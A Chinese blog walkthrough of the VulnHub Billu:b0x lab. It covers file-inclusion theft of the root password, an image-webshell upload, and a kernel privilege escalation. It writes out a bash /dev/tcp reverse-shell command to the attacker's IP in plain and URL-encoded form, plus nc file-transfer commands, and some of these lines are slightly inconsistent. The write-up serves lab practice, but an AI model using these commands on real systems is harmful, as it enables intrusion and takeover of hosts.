VULNHUB BILLU:B0X 1演练

最新推荐文章于 2024-03-06 16:13:17 发布
最新推荐文章于 2024-03-06 16:13:17 发布
阅读量201 收藏
点赞数
分类专栏: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shijianyoulei6/article/details/96916990
版权

 

点击查看作者原文链接

target IP:不详

1.

先使用nmap扫描局域网内cunhuoz主机,进行排查

排查后的到靶机IP为192.168.171.154

使用dirb扫描目录

逐个进行排查,

发现使用phpmyadmin管理数据库

发现192.168.171.154/in页面为phpinfo,搜索www找到绝对路径

发现192.168.171.154/test页面中可能存在文件包含漏洞

尝试下载phpmyadmin配置文件

无法下载,改为POST请求

下载成功,打开发现root及其密码

得到root密码,进行SSH连接,

成功!getshell

2.

用burp抓包 c.php时,发现数据库账号密码

尝试登录phpmyadmin

登陆成功,发现phpmyadmin版本号3.4.7

searchsploit phpmyadmin 3.4发现可利用的POC

 

 

 

 

 

 

 

在phmyadmin中查看web账号密码

登录web页面,查看功能,发现有上传,尝试上传木马

图片马成功

上面审计panel.php中,也发现文件包含漏洞,可以传一个load

解析13.jpg,cmd赋值whoami,执行成功

发现用户身份为wwwdata,权限不足,开始写入反弹shell,进行提权

kali开启监听

反弹shell命令,直接输入尝试不行,需要URL编码一下

echo “bash -i >& /dev/tcp/192.168.171.157/4444 >&1” | bash

%65%63%68%6F%20%22%62%61%73%68%20%2D%69%20%3E%26%20%2F%64%65%76%2F%74%63%70%2F%31%39%32%2E%31%36%38%2E%31%37%31%2E%31%35%36%2F%34%34%34%34%20%30%3E%26%31%22%20%7C%20%62%61%73%68

 

 

 

 

 

 

kali收到

lsb release -a命令无法使用,uname -a查看版本号,搜索相应的提权方式

searchsploit 3.13 找到提权poc

使用nc命令将37292.c传至靶机

kali:nc -q 1 -lp 333 < 37292.c

靶机: nv -nv 192.168.171.156 333 > 37292.c

查看用法

靶机gcc命令进行编译 gcc 37292.c -o exp

执行

获得root权限

heloy.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
billu-b0x靶场渗透
11-14
billu-b0x靶场渗透
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场,靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
billu_b0x 靶机渗透实战
n5xxxx__zy的博客
07-23 1057
这啥 我咋能知道账号是啥 1、信息收集 由于kali是137 那么142肯定是你了 或者----->arp-scan -l 主机探测: 访问80端口 尝试注入: 他竟然暗示我展示我的注入skill 没办法了不能在低调下去了 尝试了常见弱口令, 万能密码 发现它把单引号过滤掉了 怎么办 扔sqlmap跑post 以前都是跑GET,怎么跑POST呢? (1)就是让sqlmap去自...
vulnhub靶场:BILLU: B0X
weixin_46497491的博客
03-30 171
vulnhub靶场:BILLU: B0X sql注入、文件上传、文件包含、反弹shell、Linux内核提权
vulnhub——BILLU: B0X
weixin_54431413的博客
05-31 384
第一个思路主要是来利用sql注入,文件上传和文件包含漏洞结合来拿到shell,之后利用内核漏洞提权 第二个思路主要是对目标靶机进行了完整的信息收集,拿到更多了信息,利用了文件下载漏洞,拿到了root的密码,直接利用ssh登录目标服务器
Vulnhub靶机:Billu_b0x
qq_48904485的博客
03-06 691
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Billu_b0x(192.168.56.107)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip。
Vulnhub 渗透练习(二)—— BILLU: B0X
shinygod的博客
02-15 434
最后在靶机上依次执行如下命令,当然这边用 wget 下载,我们攻击机开个 apache 服务就行了,本来可以在攻击机上直接编译好,然后直接传 exp,但是kail 上编译的时候一直报错,就只能到靶机上编译了。通过 test 目录的文件读取 phpmyadmin 的配置信息,获得 root 密码,又因为目标靶机开了 22 端口,所以我们可以直接 ssh 登录。penal.php 最主要的就是俩个功能,一个文件包含,还有一个就是文件上传,且上传的目录也告诉我们了,/uploaded_images。
Vulnhub靶机笔记01——Billu_b0x
2301_76329510的博客
04-16 1270
test。
[VulnHub靶机渗透]一:billu_b0x
qq_45927819的博客
03-06 2884
文章目录实验环境实验步骤一、信息收集1.1 扫描主机所在网段进行主机发现1.2 端口扫描1.3 网站指纹信息扫描(whatweb)1.4 dirb爆破Web目录二、web渗透2.1 ssh爆破并获取shell2.2 web站点渗透2.2.1 index.php(登陆界面)2.2.2 add.php (空壳文件)2.2.3 test.php(文件包含可利用)2.2.4 phpmy (phpmyadmin)补充:2.2.5 phpmyadmin挂马2.2.5.1 利用outfile写文件挂马**2.2.5.2
Vulnhub系列】Billu_b0x
大方子
11-17 2515
简介 VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。 官网:https://www.vulnhub.com/ 信息收...
VulnhubBILLU: B0X 2靶场
ierciyuan的博客
06-14 315
思路清晰,过程流畅,一次比较简单的靶场渗透。 涉及Drupal远程命令执行漏洞、/etc/passwd写入用户提权、suid权限文件执行提权。
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups ...比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root G0rmint 基本渗透 BSides Vancuver:2018年 Toppo:1 Billu Box 2 基
VMware-ovftool-4.4.0-15722219-win.x86_64.rar
05-03
1. 目标环境的虚拟硬件版本不兼容:ovftool在导入OVF或OVA时,会检查目标环境的虚拟硬件版本是否支持导入的虚拟机配置。如果目标环境的硬件版本过低,可能会导致导入失败。 2. OVF模板与导入环境不匹配:OVF文件中...
Java软件开发实战 Java基础与案例开发详解 19-7 综合示例 共10页.pdf
最新发布
07-07
完整版:https://download.csdn.net/download/qq_27595745/89522468 【课程大纲】 1-1 什么是java 1-2 认识java语言 1-3 java平台的体系结构 1-4 java SE环境安装和配置 2-1 java程序简介 2-2 计算机中的程序 2-3 java程序 2-4 java类库组织结构和文档 2-5 java虚拟机简介 2-6 java的垃圾回收器 2-7 java上机练习 3-1 java语言基础入门 3-2 数据的分类 3-3 标识符、关键字和常量 3-4 运算符 3-5 表达式 3-6 顺序结构和选择结构 3-7 循环语句 3-8 跳转语句 3-9 MyEclipse工具介绍 3-10 java基础知识章节练习 4-1 一维数组 4-2 数组应用 4-3 多维数组 4-4 排序算法 4-5 增强for循环 4-6 数组和排序算法章节练习 5-0 抽象和封装 5-1 面向过程的设计思想 5-2 面向对象的设计思想 5-3 抽象 5-4 封装 5-5 属性 5-6 方法的定义 5-7 this关键字 5-8 javaBean 5-9 包 package 5-10 抽象和封装章节练习 6-0 继承和多态 6-1 继承 6-2 object类 6-3 多态 6-4 访问修饰符 6-5 static修饰符 6-6 final修饰符 6-7 abstract修饰符 6-8 接口 6-9 继承和多态 章节练习 7-1 面向对象的分析与设计简介 7-2 对象模型建立 7-3 类之间的关系 7-4 软件的可维护与复用设计原则 7-5 面向对象的设计与分析 章节练习 8-1 内部类与包装器 8-2 对象包装器 8-3 装箱和拆箱 8-4 练习题 9-1 常用类介绍 9-2 StringBuffer和String Builder类 9-3 Rintime类的使用 9-4 日期类简介 9-5 java程序国际化的实现 9-6 Random类和Math类 9-7 枚举 9-8 练习题 10-1 java异常处理 10-2 认识异常 10-3 使用try和catch捕获异常 10-4 使用throw和throws引发异常 10-5 finally关键字 10-6 getMessage和printStackTrace方法 10-7 异常分类 10-8 自定义异常类 10-9 练习题 11-1 Java集合框架和泛型机制 11-2 Collection接口 11-3 Set接口实现类 11-4 List接口实现类 11-5 Map接口 11-6 Collections类 11-7 泛型概述 11-8 练习题 12-1 多线程 12-2 线程的生命周期 12-3 线程的调度和优先级 12-4 线程的同步 12-5 集合类的同步问题 12-6 用Timer类调度任务 12-7 练习题 13-1 Java IO 13-2 Java IO原理 13-3 流类的结构 13-4 文件流 13-5 缓冲流 13-6 转换流 13-7 数据流 13-8 打印流 13-9 对象流 13-10 随机存取文件流 13-11 zip文件流 13-12 练习题 14-1 图形用户界面设计 14-2 事件处理机制 14-3 AWT常用组件 14-4 swing简介 14-5 可视化开发swing组件 14-6 声音的播放和处理 14-7 2D图形的绘制 14-8 练习题 15-1 反射 15-2 使用Java反射机制 15-3 反射与动态代理 15-4 练习题 16-1 Java标注 16-2 JDK内置的基本标注类型 16-3 自定义标注类型 16-4 对标注进行标注 16-5 利用反射获取标注信息 16-6 练习题 17-1 顶目实战1-单机版五子棋游戏 17-2 总体设计 17-3 代码实现 17-4 程序的运行与发布 17-5 手动生成可执行JAR文件 17-6 练习题 18-1 Java数据库编程 18-2 JDBC类和接口 18-3 JDBC操作SQL 18-4 JDBC基本示例 18-5 JDBC应用示例 18-6 练习题 19-1 。。。
100款古风PPT (60)(1).pptx
07-06
【ppt素材】工作总结、商业计划书、述职报告、读书分享、家长会、主题班会、端午节、期末、夏至、中国风、卡通、小清新、岗位竞聘、公司介绍、读书分享、安全教育、文明礼仪、儿童故事、绘本、防溺水、夏季安全、科技风、商务、炫酷、企业培训、自我介绍、产品介绍、师德师风、班主任培训、神话故事、巴黎奥运会、世界献血者日、防范非法集资、3D快闪、毛玻璃、人工智能等等各种样式的ppt素材风格。 设计模板、图片素材、PPT模板、视频素材、办公文档、小报模板、表格模板、音效配乐、字体库。 广告设计:海报,易拉宝,展板,宣传单,宣传栏,画册,邀请函,优惠券,贺卡,文化墙,标语,制度,名片,舞台背景,广告牌,证书,明信片,菜单,折页,封面,节目单,门头,美陈,拱门,展架等。 电商设计:主图,直通车,详情页,PC端首页,移动端首页,钻展,优惠券,促销标签,店招,店铺公告等。 图片素材:PNG素材,背景素材,矢量素材,插画,元素,艺术字,UI设计等。 视频素材:AE模板,会声会影,PR模板,视频背景,实拍短片,音效配乐。 办公文档:工作汇报,毕业答辩,企业介绍,总结计划,教学课件,求职简历等PPT/WORD模板。
DS18B20 - 数字温度传感器
07-07
DS18B20是一种数字温度传感器,被广泛应用于各种温度监测和控制系统中。它基于单总线协议,具有数字输出和高精度的温度测量能力。以下是对DS18B20的详细介绍: DS18B20采用了数字温度传感器技术,可以准确测量环境温度并将结果以数字形式输出。它的工作原理基于温度导致的半导体材料电阻值的变化。DS18B20内部集成了温度传感器、模数转换器和单总线接口电路,使得它在一个小型封装中实现了高度集成和功能完整性。 DS18B20的特点之一是其数字输出和单总线接口。它使用单总线协议进行通信,只需要一条数据线连接到主控设备,简化了连接和布线。通过发送特定的指令和接收传感器的响应,主控设备可以读取温度值并进行相应的处理和控制操作。 DS18B20具有高精度的温度测量能力。它可以在范围从-55°C到+125°C内测量温度,并具有0.5°C的温度分辨率。此外,它还具有温度报警功能,可以在温度达到预设阈值时触发警报,提供温度监测和控制的实时反馈。 DS18B20在各种应用中都得到了广泛应用。它适用于温度监测和控制系统,如室内温度监测、恒温控制、温度报警系统等。它还可以用于工业自动化、气象站、电
si2302中文资料-数据手册-参数.pdf
07-06
对MOS的应用和参数做了详细的说明附带测试数据
光能手机万能充电器设计.doc
07-06
用TMS320F28027的DSP作为主控芯片,制作了一部太阳能充电和和逆变装置。设计主要采用了DC-DC变换器,推挽变换器,DC-AC变换器,通过算法寻找太阳能电池的最大功率点。 关键词:DSP、充电、buck电路、最大功率点跟踪、登山法
MongoDB基本操作-读取MongoDB中的数据.pdf
07-07
MongoDB基本操作——读取MongoDB中的数据

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值